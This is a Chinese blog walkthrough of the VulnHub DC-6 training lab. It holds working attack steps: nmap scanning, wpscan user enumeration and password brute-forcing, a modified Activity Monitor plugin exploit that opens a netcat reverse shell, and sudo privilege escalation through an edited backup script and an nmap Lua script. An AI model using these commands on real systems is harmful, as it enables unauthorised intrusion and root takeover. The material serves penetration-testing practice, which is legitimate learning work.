DC系列靶场---DC 6靶场的渗透测试

最新推荐文章于 2024-08-08 08:45:00 发布
最新推荐文章于 2024-08-08 08:45:00 发布
阅读量714 收藏 9
点赞数 16
分类专栏: DC系列靶场 文章标签: 经验分享 网络 安全 linux windows
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zhouA0221/article/details/140965675
版权

信息收集

地址探测

使用arp-scan对目标主机IP地址做探测

arp-scan -l -I eth0

端口扫描

nmap -sS -sV -T4 -p- -O 172.30.1.133

-sS 使用NmapSYN扫描,秘密扫描(默认)

-sV 对服务版本检测

-T4 野蛮的扫描(常用)

-p- 扫描所有端口

-O 扫描服务器版本

http探测

通过扫描可以看到目标主机的web需要域名解析

Hosts文件优先级更高,写入格式 “IP地址 域名”

cat /etc/hosts

现在可以直接通过域名访问了

这里我们使用插件看到这是WordPress的CMS,wpscan准门针对WordPress开发的

用户枚举

使用wpscan扫描和用户枚举

wpscan --url http://wordy -e u

扫描后可以看四个用户:admin、graham、mark、sarah、jens

暴力破解

Wpscan爆破

官网是由题目的,想要爆破速度快,可以先过滤这个字典文件

cat /usr/share/wordlists/rockyou.txt | grep k01 >> passwd.txt

wpscan --url http://wordy -U user.txt -P pass.txt

爆破结果:

Username: mark, Password: helpdesk01

漏洞探测及利用

登录后台

登录到管理后台,通过wp-scan扫描得到的登录地址为wp-admin

也就是http://wordy/wp-admin/

扫描插件

Wpscan对目标主机进行插件版本扫描--plugins-version detection

wpscan --plugins-version detection --url http://wordy

这个插件最新版本是20180826,目标主机使用的是20161228版本

漏洞搜索

使用searchsploit对插件进行漏洞搜索

searchsploit activity monitor

下面这两个都需要得到认证才可以利用,我们已经拿到认证了,就是网站的后台。

将html镜像到本地主机

searchsploit -m 45274.html

编辑文件

注意:原文件中的8000端口要删除,不然会自动转到8000转口。

         原文件中nc -nlvp 要改成 nc -nv

根据nc得端口开启侦听

nc -lnvp 9999

修改完成后我们放到本地主机得web中。然后开启apacha2服务器。

cp 45274.html /var/www/html

systemctl start apache2

直接访问本机web服务器,例:172.30.1.20/45274.html

点击按钮提交

在我们侦听得端口就看到这里已经拿到目标主机的shell权限了

提权

信息收集

查看系统的账户文件

cat /etc/passwd

发现这里有四个用户

ls

cd mark

ls

cd stuff

ls

cat things-to-do.txt

Graham用户

Mark家目录下有个文本文件,内容就是有个用户graham账户文件中是有这个用户的,后面的很可能就是这个用户的密码。

su - graham

现在已经登录成功

sudo -l

使用graham用户查看sudo的使用权限,看到jens用户可以不用输入密码执行backups.sh脚本。但是我现在是graham用户。

jens用户

这里是一个脚本文件,如果这是一个命令就不好办了。

尝试在脚本中添加一个shell,这和任务计划提权是差不多的。

方法很简单直接追加或者写入

echo "/bin/bash" >> /home/jens/backups.sh

指定jens用户运行该脚本

sudo -u jens /home/jens/backups.sh

这样就拿到了jens用户的shell

看到jens用户有Nmap的sudo授权

sudo -l

Nmap是可以通过sudo进行提权的,直接复制命令

(b)是要求版本的   (a)这个是可以直接使用的

TF=$(mktemp)
echo 'os.execute("/bin/sh")' > $TF
sudo nmap --script=$TF

直接切换到root的家目录,查看flag

cd /root

cat theflag.txt

成功拿到flag。

总结:

1、wpscan可以对wordpress网站进行用户枚举

2、枚举用户后根据用户制作一个字典,使用wpscan进行暴力破解

3、wpscan也可以对网站的插件进行版本检测,是否过时。

4、在进行提权之前一定要进行信息收集,信息收集很重要。

5、信息收集的时候一定要注意用户家目录的文本文件,这里面很容易出现密码

6、在从graham用户切换到jens用户时查看sudo权限的时候要注意脚本文件,脚本是直接可以进行提权的。

7、每次切换用户都要进行信息收集,所以说信息收集很重要。尤其是sudo、SUID如果不知道怎么提权可以去搜索

白帽子二三
关注
  • 16
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
DC系列漏洞靶场-渗透测试学习复现(DC-1)
W983079520的博客
11-01 2714
最近闲着冲浪玩发现了DC系列漏洞靶场(下载了8个靶场DC-1到DC-8),从信息收集到最后拿到超级管理员权限,可以说几乎贯穿了渗透测试的每一步,寻找一个个flag,通过flag中的指引内容,帮助我们拿到最后的root身份,过程还是挺有趣的! DC系列靶机下载地址:https://download.vulnhub.com/dc/DC-6.zip(DC后的数字可以换成1-8中任意一个) DC-1是一个易受攻击的实验环境,最终目的是让攻击者获得root权限,并读取flag。 DC-1提权关键词:find
DC系列漏洞靶场-渗透测试学习复现(DC-2)
W983079520的博客
11-03 1816
DC-2是一个易受攻击的实验环境,最终目的是让攻击者获得root权限,并读取flag。 本篇文档中用到了vi提权和git提权。 1 环境搭建 下载靶场文件,使用Vbox或者VM打开即可;攻击机使用kali-2020。 2 主机发现 使用Kali中的arp-scan工具扫描结果如下: 172.16.12.145为DC-2靶机的IP地址。 3 端口探测 探测使用nmap工具 端口扫描结果如下: 由扫描结果知开放端口有两个: 80(http默认端口)和运行着SSH服务的7744端口。
DC系列靶场---DC 5靶场渗透测试
zhouA0221的博客
08-06 1096
DOS格式的文本文件在Linux底下,用较低版本的vi打开时行尾会显示^M,而且很多命令都无法很好的处理这种格式的文件,如果是个shell脚本,。因此产生了两种格式文件相互转换的需求,对应的将UNIX格式文本文件转成成DOS格式的是unix2dos命令。提交后重定向到thankyou.php的文件中,随着不断刷新,看到页脚的版本在发生改变,这个就是文件包含漏洞啦。服务器执行PHP文件时,可以通过文件包含函数加载另外一个文件(参数),另外一个文件中的PHP代码就会被执行,file=footer.php。
DC系列靶场---DC 7靶场渗透测试
最新发布
zhouA0221的博客
08-08 656
通过 Drush,开发者可以在终端中执行常见的 Drupal 操作,如安装、更新、8、邮件通过脚本执行,每15分钟执行一次,把nc的反弹shell写入脚本文件,攻击端侦听,等待目标主机执行脚本。4、通过查看邮件发现使用了drupal中drush程序,这个工具可以更改用户的密码。这个时候要等,因为这个脚本文件是每15分钟执行一次,所以只需要等待就可以。3、在网站中登录发现不行,之前还扫到一个22端口,通过22端口远程登陆上。看到源码中有config的文件,这个肯定是配置文件,可以看一下。
DC系列靶场---DC 1靶场渗透测试(一)
zhouA0221的博客
07-17 1258
也就是提示我们去查看这个CMS的配置文件。因为Drupal是开源的所以我们是可以通过搜索引擎搜到配置文件的路径的。我们的思路可以从官方文档中查找一些关于drupal7的密码恢复之类的文件。这里用户有两个用户,我们只需要关注admin这个用户,这个应该是网站管理员的账户和密码。我们已经成功登录到目标主机的mysql数据库了,我们看一下数据库中有哪些重要的信息。看到这是flag2,从flag2中我们可以看到这是mysql的账号和密码。看到一个users的数据表,这个表中我们通过名字应该能猜测到这个是用户表。
Vulnhub靶场 | DC系列 - DC1
哦 卷!
07-13 1145
发现该网站是 drupal[//]: # (Drupal是使用PHP语言编写的开源内容管理框架(CMF),它由内容管理系统(CMS)和PHP开发框架(Framework)共同构成,在GPL2.0及更新协议下发布。根据上面flag1.txt的提示,在网站目录中寻找相应的配置文件(当然没有提示,也应该寻找看一下,毕竟是敏感文件)。,则需要登录flag4用户。查看 users 表中的内容:由于列数比较多,查看内容比较乱,可以使用。尝试查看flag4用户的家目录,确实存在flag4.txt文件,
DC系列靶场---DC 2靶场渗透测试(二)
zhouA0221的博客
07-22 1339
虽然我们现在已经可以执行切换路径命令了,但是发现还有是很多命令不能用。我想看看一下目标主机的所有用户,是不能执行的。那我们就用到了当前shell逃逸。第一种情况:/ 被允许的情况下;直接 /bin/sh 或 /bin/bash第二种情况:能够设置PATH或SHELL时。现在我们是符合第一种情况的所以我们直接使用/bin/sh 或者 /bin/bash现在我们就可以使用cat命令了,当然其他命令我们也是可以进行执行的。
Vulnhub靶场----6、DC-6
七天
02-24 813
Vulnhub-DC6
DC系列靶场---DC 2靶场渗透测试(一)
zhouA0221的博客
07-19 865
我们可以尝试远程连接,我们尝试一下这两个用户哪个可以通过SSH进行远程登录。用户是可以通过ssh进行远程连接的,但是端口号要指定为7744,因为我们通过nmap扫描到了7744端口为ssh服务。主要是因为管理员给tom用户限制了bash,我们可以通过环境变量看一下,我们tom用户可以使用哪些命令。我们可以看到这是一个WordPress的CMS,还可以看到一个Flag。我们在使用命令的时候发现不能执行,没有这个命令,还发现了一个-rbash。我们是可以使用vi的,所以我们通过vi这个命令来进行逃逸。
中电信翼康济世数据中台基于Apache SeaTunnel构建数据集成平台经验分享
weixin_54625990的博客
08-07 434
Apache SeaTunnel作为一个高效、灵活的数据集成平台,在数据中台战略中扮演着重要角色。通过本文的介绍,读者可以了解如何基于SeaTunnel快速搭建数据集成平台,并在实际应用中灵活运用。未来,随着技术的不断发展,SeaTunnel将继续在数据集成领域发挥重要作用,助力企业实现数据驱动的业务变革。本文由白鲸开源科技提供发布支持!
J031_使用TCP协议支持与多个客户端同时通信
lzn20161229的博客
08-03 436
使用TCP协议支持与多个客户端同时通信。
如何计算UDP校验和
ZhongUncle的博客
08-07 605
在了解 UDP 校验和的时候,发现资料很少,如果看教材的话,一定看到过下面这两张图,但是又看不懂,加上解释之后也难懂:本文先说具体怎么算的,再说一些细节,过程中顺带解释一下这两个图(第一张图是布局情况,第二张图是解释如何计算的)。
【Vulnhub系列】Vulnhub Connect-The-Dots 靶场渗透(原创)
Lusen的博客
08-02 600
Vulnhub系列Connect-The-Dots靶场做题记录
如何提前预防网络威胁
dexun123的博客
08-06 631
这场攻击规模空前,据官方数据,受影响的服务器数量飙升至3800余台,波及范围广泛,尤以美、加、法、德等国的企业为重灾区。态势感知,作为一种根植于环境、动态且全局性的安全风险洞察能力,其核心在于运用安全大数据的浩瀚资源,从宏观视角深化对安全威胁的发现、理解、分析及响应能力,最终引领至精准的安全决策与行动。态势感知强调对网络安全态势的全方位、实时、动态监控与评估,旨在于攻击链条的每一个细微环节捕捉异常,无论是情报搜集的微妙动作,还是攻击尝试的初步试探,乃至数据窃取与情报回传的隐蔽行动,都难逃其敏锐的“法眼”。
Node.js Buffer深入解析:大端与小端字节序的区别与用途
计算机图形学
08-04 336
综上所述,大端和小端字节序在Node.js的Buffer处理中扮演着重要角色。了解它们的区别和用途对于进行网络通信、文件处理、跨平台开发以及性能优化等任务至关重要。在实际应用中,开发者需要根据具体需求和场景选择合适的字节序处理方式。大端字节序(Big-Endian)和小端字节序(Little-Endian)是两种不同的数据存储方式,它们主要区别在于多字节数据(如整数、浮点数等)在内存中的存储顺序。
【计算机网络——1.4接入网和物理媒体】
2301_76758064的博客
08-07 181
例如,如果您使用电话线接入互联网(也就是拨号上网),计算机产生的数字信号需要被转换成能在电话线上传输的模拟信号,这时候就需要 Modem 来完成这个转换。把电话线接入城路交换机(城域网中使用的一种网络交换机),但是电话线是传输语音的,语音的带宽很窄,4K赫兹(人可理解语音频率覆盖范围:300hz-3400hz)。同样能量的电磁波信号在导引型媒体中传的远,因为在无线的介质当中,电磁波信号和光的信号随着距离平方成反比,迅速衰减。调幅:音频传输的幅度比较高的持续一段时间代表1,低的持续一段时间代表0。
Linux shell编程学习笔记68: curl 命令行网络数据传输工具 选项数量雷人(上)
Purpleendurer@CSDN
08-04 1002
网络时代,有经常需要在网络上传输数据,时我们需要通过网络下载文件,为了满足这种时代需要,Linux提供了众多网络命令,我们今天先研究curl命令。例如,我们可以使用curl从 URL 下载文件,或将文件上传到服务器。
开发android app用于移远模块读写IMEI 模组EC200DEULA-D08-SNNDA 支持socket连接读写IMEI
chenhao0568的专栏
08-07 191
发送{“function”: “write_imei”,“imei”: “860004050179648”}响应{“message”: “success”,“imei”: “860004050179648”}当结果正常时message为success,否则message给出英文具体原因,其它参数可能为空。发送{“function”: “read_imei”}响应{“message”: “success”}前面本地5902 转发到 后面设备为5902。PC与终端APP之间 json通信协议。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

白帽子二三

您的鼓励是我最大的前进动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值